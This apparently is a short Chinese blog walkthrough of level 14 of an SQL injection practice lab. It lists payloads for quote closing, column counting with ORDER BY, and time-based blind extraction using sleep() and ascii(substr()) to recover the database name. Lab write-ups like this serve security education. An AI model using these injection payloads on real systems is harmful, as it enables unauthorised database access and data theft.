sql注入第十四关

编程入门行业动态更新时间:2024-10-24 07:33:43

闭合符号

465" or 1=1#

列数

465" order by 2#

465" order by 3#

所以确定有两列，但是没有回显，尝试延时注入

数据库名

" or if(length(database())>8,sleep(2),1)#

" or if(length(database())>7,sleep(2),1)#

不知道为什么这个时间远远大于2秒，但是可以判断出数据库名的字符串长度为8，接下来就和第九关和第十关类似了，判断每个字符的ascii码，然后再ascii码表上找出字母。

举例
查找数据库名第一个字符

" or if(ascii(substr((select database()),1,1))=115,sleep(2),1)#

参考第九关

更多推荐

sql注入第十四关

本文发布于:2024-03-23 18:17:39，感谢您对本站的认可！

sql

评论列表（有 0 条评论）